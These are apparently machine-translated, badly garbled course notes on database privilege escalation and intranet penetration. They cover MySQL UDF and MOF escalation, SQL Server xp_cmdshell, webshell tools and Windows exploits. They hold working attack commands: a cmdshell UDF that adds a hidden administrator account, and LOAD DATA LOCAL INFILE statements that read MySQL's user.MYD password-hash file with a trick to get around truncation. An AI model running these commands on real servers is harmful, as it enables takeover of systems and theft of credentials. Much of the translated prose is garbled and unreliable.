05 Power raising and Intranet penetration

The third chapter Database delivery

Section 1 SQL Server Database vulnerability exploitation and right raising

dbo jurisdiction Backup database Can not be Carry out orders

SESHELL
mdb The registry operation Carry out orders

In the second quarter MySQL Database vulnerability and right raising

mysql root Under authority Raise the right

Installation problems
Default in System administrator Next install

To serve start-up

Backup database Just There will be file

mof timing Fine Raise the right

long-range Carry out orders rebound shell Come back *（ attack Listening port ）

UDF To enforce system orders

● Linux UDF
The administrator who obtains the target through the database shell, From low authority to high authority

sleep(),sum(),ascii()

 User defined functions 
 Write your own convenient functions , It has 3 A return value ,
 Namely STRING Character ,INTEGER integer ,REAL  real 
  


- master mysql Database account , From having to mysql Of insert and delete jurisdiction , To create and discard functions . Have can udf.dll Permission to write to the corresponding directory 

 The version is greater than 5.1 Of udf.dll Put it in mysql Installation directory libplugin Folder to create custom functions . The directory does not exist by default. You need to create it yourself , Create... In the installation directory libplugin Folder , And then udf.dll Export to this directory .

- windows Premise of raising right

mysql The version is greater than 5.1,
udf.dll The file must be placed in mysql Installation directory lib plugin Under the folder

mysql Version less than 5.1,
udf.dll The file in windows server 2003 Drop on c:windows system32 Catalog ,
stay windows server - - 2000 Place under c:winnt system32 Catalog .

  First 、 Check it out. MySQL yes 32 It's still 64 Bit , There are several ways to view this ：
mysql -V
mysql --version
 Get into MySQL In the database , perform ： 


show variables like '%datadir%';
-- C:\ProgramData\MySQL\MySQL Server 5.7\Data\


show variables like '%version_%';

 create function cmdshell returns string soname 'udf.dll' 
select cmdshell('net user iis_user [email protected]#abcABC /add'); 
select cmdshell('net localgroup administrators iis_user /add'); 
select cmdshell('regedit /s d:web3389.reg'); 
drop function cmdshell; 
select cmdshell('netstat -an'); 

• requirement root jurisdiction

• mof yes win System comes with Loophole

Mysql Of users are not File Authority - Low authority to get root password

Mysql Exploit （ Ultra vires , Get... From low authority root password ）

Unable to get Load_file Reading documents
Or by into dumpfile perhaps into outfile To write a document

adopt load data infile You can read local files to the database , In this way, we can pass this under low permissions bug Read the file on the server

Read mysql Database files ,mysql Library user The table contains all users' hash

 LOAD DATA LOCAL INFILE 'C:/boot.ini' INTO TABLE test FIELDS TERMINATED BY '';  

 
LOAD DATA LOCAL INFILE 'C:/wamp/bin/mysql/mysql5.6.12/data/mysql/user.MYD' INTO TABLE test2 fields terminated by ''; 

select * from test2;

use winhex Open it up user.myd file

By 00 The character is truncated , As a result, the following items are not included in the database .
Let's try to get around this limitation .
After several attempts to find , Add after LINES TERMINATED BY ‘’ that will do , In this way, the truncation symbol is treated as a separator , Complete statement

 
LOAD DATA LOCAL INFILE 'C:/wamp/bin/mysql/mysql5.6.12/data/mysql/user2.MYD' INTO TABLE test2 fields terminated by '' LINES TERMINATED BY ''; 

Windows Smb replay / relay utilize

CTF- Difficult kernel power raising

windows EXP Raise the right

EXP Spillover claims （ You can't use techniques / Accessibility rights ）

exploit —>windows Overflow utilization

shell Connect

Virtual connection rights

• Chinese kitchen knife
• Ant sword
• Malaysia shell Carry out orders dir

In a word, the Trojan horse raises the right

Deal with virualbox The problem of connecting with the physical machine

Create an environment

1. View permissions whoami systeminfo （ Patch ）
2. Increase authority net user xxx xxx /add net localgroup
3. Check the port tasklist /svc netstat -ano

• Make do with Let's go C Disk file
  
• Check out the patches
  
• Patches For the moment
• Do as one pleases

• Unintentionally Found a Tools

mysql5.1------Linux Raise the right

#1 Simple deep strike

 Scan weak passwords through assets     FTP  Mysql   Redis   ssh   RPC 

  because  root  jurisdiction    Free from low and high permissions  UDP  Raise the right 

i spring and autumn \05 Power raising and Intranet penetration \

Chapter one Right of first sight

Section 1 Overview of right raising

Basic commands

Check user login query user

Dirty cow loopholes

Third party software Raise the right - pr Raise the right

Database delivery

sqlserver SA xp cmd shell

mysql udf Plug in authorization Affirm the right MOF Replace file Raise the right

dll file load

ftp typewriting vnc To configure

typewriting Replace exe restart Automatic loading

• webshell It's based on middleware When installing Authority Based on

In the second quarter Based on password cracking to lift the right

Hash get cracking

LAN arp 、 dns hijacked Sniffing